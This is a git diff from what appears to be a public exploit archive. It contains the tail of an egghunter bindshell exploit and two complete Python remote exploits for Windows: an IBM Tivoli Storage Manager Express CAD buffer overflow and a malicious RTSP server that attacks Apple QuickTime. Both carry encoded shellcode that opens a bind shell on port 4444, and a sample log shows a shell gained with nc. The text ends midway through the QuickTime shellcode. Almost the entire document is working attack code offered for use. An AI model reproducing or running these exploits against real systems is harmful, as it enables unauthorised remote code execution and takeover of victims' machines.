+"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" +"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" +"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" +"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" +"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" +"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" +"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" +"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" +"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" +"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" +"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" +"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" +"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" +"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" +"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" +"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" +"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" +"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" +"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" +"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" +"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") + +print "[*] Sending evil payload to "+sys.argv[1] +":8080" +expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n') +print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell" +print "[*] Happy Hunting!" +expl.close() + +# milw0rm.com [2007-06-03] diff --git a/platforms/windows/remote/4573.py b/platforms/windows/remote/4573.py index 6170ef1e9..707ba1a46 100755 --- a/platforms/windows/remote/4573.py +++ b/platforms/windows/remote/4573.py @@ -1,100 +1,100 @@ -#!/usr/bin/python -# -# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3) -# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html -# Tested on windows 2003 server SP0. -# Coded by Mati Aharoni -# muts.at.offensive-security.com -# http://www.offensive-security.com/0day/dsmcad.py.txt -# -# bt ~ # ./dsmcad.py 192.168.1.107 -# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow -# [*] http://www.offensive-security.com -# [*] Connecting to 192.168.1.107 -# [*] Sending evil buffer, ph33r -# [*] Check port 4444 for bindshell -# -# bt ~ # nc -v 192.168.1.107 4444 -# 192.168.1.107: inverse host lookup failed: Unknown host -# (UNKNOWN) [192.168.1.107] 4444 (krb524) open -# Microsoft Windows [Version 5.2.3790] -# (C) Copyright 1985-2003 Microsoft Corp. -# -# E:\Program Files\Tivoli\TSM\baclient> - -import socket -import sys - -print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow" -print "[*] http://www.offensive-security.com" - -def usage(): - print "[*] Usage: ./dsmcad.py " - sys.exit(1) - -if len(sys.argv) != 2: - usage() - -buffer="BirdsflyinghighyouknowhowIfeel" -buffer+="SunintheskyyouknowhowIfeel" -buffer+="ReeedsdriftinonbyyouknowhowIfeel" -buffer+="ItsanewdawnItsanewdayItsanewlifeForme" -buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme" - -buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN -buffer+="\x90"*4 -buffer+=( -# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" -"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32" -"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31" -"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33" -"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c" -"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65" -"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75" -"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c" -"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b" -"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a" -"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64" -"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66" -"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57" -"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54" -"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73" -"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b" -"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63" -"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58" -"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f" -"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73" -"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e" -"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42" -"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71" -"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41" -"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62" -"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c" -"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49" -"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b" -"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e" -"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a" -"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72" -"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76" -"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37" -"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30" -"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e" -"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30" -"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76" -"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68" -"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e" -"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46" -"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b" -"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b" -"\x4f\x48\x56\x49\x6f\x48\x50\x61") -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -print "[*] Connecting to "+sys.argv[1] -expl.connect ( ( sys.argv[1], 1581 ) ) -print "[*] Sending evil buffer, ph33r" -expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n') -expl.close() -print "[*] Check port 4444 for bindshell" - -# milw0rm.com [2007-10-27] +#!/usr/bin/python +# +# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3) +# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html +# Tested on windows 2003 server SP0. +# Coded by Mati Aharoni +# muts.at.offensive-security.com +# http://www.offensive-security.com/0day/dsmcad.py.txt +# +# bt ~ # ./dsmcad.py 192.168.1.107 +# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow +# [*] http://www.offensive-security.com +# [*] Connecting to 192.168.1.107 +# [*] Sending evil buffer, ph33r +# [*] Check port 4444 for bindshell +# +# bt ~ # nc -v 192.168.1.107 4444 +# 192.168.1.107: inverse host lookup failed: Unknown host +# (UNKNOWN) [192.168.1.107] 4444 (krb524) open +# Microsoft Windows [Version 5.2.3790] +# (C) Copyright 1985-2003 Microsoft Corp. +# +# E:\Program Files\Tivoli\TSM\baclient> + +import socket +import sys + +print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow" +print "[*] http://www.offensive-security.com" + +def usage(): + print "[*] Usage: ./dsmcad.py " + sys.exit(1) + +if len(sys.argv) != 2: + usage() + +buffer="BirdsflyinghighyouknowhowIfeel" +buffer+="SunintheskyyouknowhowIfeel" +buffer+="ReeedsdriftinonbyyouknowhowIfeel" +buffer+="ItsanewdawnItsanewdayItsanewlifeForme" +buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme" + +buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN +buffer+="\x90"*4 +buffer+=( +# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" +"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32" +"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31" +"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33" +"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c" +"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65" +"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75" +"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c" +"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b" +"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a" +"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64" +"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66" +"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57" +"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54" +"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73" +"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b" +"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63" +"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58" +"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f" +"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73" +"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e" +"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42" +"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71" +"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41" +"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62" +"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c" +"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49" +"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b" +"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e" +"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a" +"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72" +"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76" +"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37" +"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30" +"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e" +"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30" +"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76" +"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68" +"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e" +"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46" +"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b" +"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b" +"\x4f\x48\x56\x49\x6f\x48\x50\x61") +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +print "[*] Connecting to "+sys.argv[1] +expl.connect ( ( sys.argv[1], 1581 ) ) +print "[*] Sending evil buffer, ph33r" +expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n') +expl.close() +print "[*] Check port 4444 for bindshell" + +# milw0rm.com [2007-10-27] diff --git a/platforms/windows/remote/4657.py b/platforms/windows/remote/4657.py index a4c52e7f1..722c38ce3 100755 --- a/platforms/windows/remote/4657.py +++ b/platforms/windows/remote/4657.py @@ -1,125 +1,125 @@ -#!/usr/bin/python -########################################################################## -# http://www.offensive-security.com -# Bug discovered by Krystian Kloskowski (h07) -# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista -# This exploit is completely "Universal" .... It has also been modded to work via url redirection ... -# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera.... -# re-edited by muts and javaguru1999 to annoy Symantec -# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html -# there IS NO SPOON! -########################################################################## -# "With Internet Explorer versions 6 and 7, and the Safari 3 beta, -# the attack appears to be prevented because standard buffer overflow -# prevention processes act before any damage can be done, Florio wrote. -# With Firefox, the QuickTime RTSP response is unmoderated. As a result, -# the exploit works against Firefox if QuickTime is the default multimedia player, -# according to Florio." -########################################################################## -# Calling Quicktime via URL kicks in an Extra Exception Handler, -# of which we have no control over. -# By making the buffer larger than the original exploit, we can overwrite -# the last exception handler, and regain control over execution. -# This is indeed an evil exploit - muhaha. -########################################################################## - -from socket import * - -header = ( -'RTSP/1.0 200 OK\r\n' -'CSeq: 1\r\n' -'Date: 0x00 :P\r\n' -'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' -'Content-Type: %s\r\n' # <-- overflow -'Content-Length: %d\r\n' -'\r\n') - -body = ( -'v=0\r\n' -'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' -'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'i=1.mp3\r\n' -'t=0 0\r\n' -'a=tool:ciamciaramcia\r\n' -'a=type:broadcast\r\n' -'a=control:*\r\n' -'a=range:npt=0-213.077\r\n' -'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'a=x-qt-text-inf:1.mp3\r\n' -'m=audio 0 RTP/AVP 14\r\n' -'c=IN IP4 0.0.0.0\r\n' -'a=control:track1\r\n' -) - -# ExitProcess shellcode will kill browser, but keep the shell open - -shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41" -"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61" -"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53" -"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e" -"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46" -"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50" -"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b" -"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b" -"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69" -"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36" -"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44" -"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56" -"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74" -"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53" -"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a" -"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71" -"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78" -"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f" -"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32" -"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c" -"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33" -"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51" -"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51" -"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41" -"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e" -"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39" -"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b" -"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e" -"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38" -"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31" -"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46" -"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30" -"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73" -"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e" -"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32" -"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30" -"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e" -"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58" -"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41" -"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b" -"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b" -"\x4f\x48\x56\x69\x6f\x6a\x70\x42") - -tmp = "A" * 987 -tmp +="\xeb\x20\x90\x90" # short jump for 7.2 -tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3 -tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3 -tmp += "\x90" * 92 -tmp += shellcode -tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions. - -header %= (tmp, len(body)) -evil = header + body - -s = socket(AF_INET, SOCK_STREAM) -s.bind(("0.0.0.0", 554)) -s.listen(1) -print "[+] Listening on [RTSP] 554" -c, addr = s.accept() -print "[+] Connection accepted from: %s" % (addr[0]) -c.recv(1024) -c.send(evil) -raw_input("[+] Done, press enter to quit") -c.close() -s.close() - -# milw0rm.com [2007-11-26] +#!/usr/bin/python +########################################################################## +# http://www.offensive-security.com +# Bug discovered by Krystian Kloskowski (h07) +# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista +# This exploit is completely "Universal" .... It has also been modded to work via url redirection ... +# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera.... +# re-edited by muts and javaguru1999 to annoy Symantec +# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html +# there IS NO SPOON! +########################################################################## +# "With Internet Explorer versions 6 and 7, and the Safari 3 beta, +# the attack appears to be prevented because standard buffer overflow +# prevention processes act before any damage can be done, Florio wrote. +# With Firefox, the QuickTime RTSP response is unmoderated. As a result, +# the exploit works against Firefox if QuickTime is the default multimedia player, +# according to Florio." +########################################################################## +# Calling Quicktime via URL kicks in an Extra Exception Handler, +# of which we have no control over. +# By making the buffer larger than the original exploit, we can overwrite +# the last exception handler, and regain control over execution. +# This is indeed an evil exploit - muhaha. +########################################################################## + +from socket import * + +header = ( +'RTSP/1.0 200 OK\r\n' +'CSeq: 1\r\n' +'Date: 0x00 :P\r\n' +'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' +'Content-Type: %s\r\n' # <-- overflow +'Content-Length: %d\r\n' +'\r\n') + +body = ( +'v=0\r\n' +'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' +'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'i=1.mp3\r\n' +'t=0 0\r\n' +'a=tool:ciamciaramcia\r\n' +'a=type:broadcast\r\n' +'a=control:*\r\n' +'a=range:npt=0-213.077\r\n' +'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'a=x-qt-text-inf:1.mp3\r\n' +'m=audio 0 RTP/AVP 14\r\n' +'c=IN IP4 0.0.0.0\r\n' +'a=control:track1\r\n' +) + +# ExitProcess shellcode will kill browser, but keep the shell open + +shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41" +"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61" +"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53" +"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e" +"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46" +"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50" +"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b" +"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b" +"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69" +"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36" +"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44" +"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56" +"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74" +"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53" +"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a" +"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71" +"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78" +"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f" +"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32" +"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c" +"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33" +"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51" +"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51" +"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41" 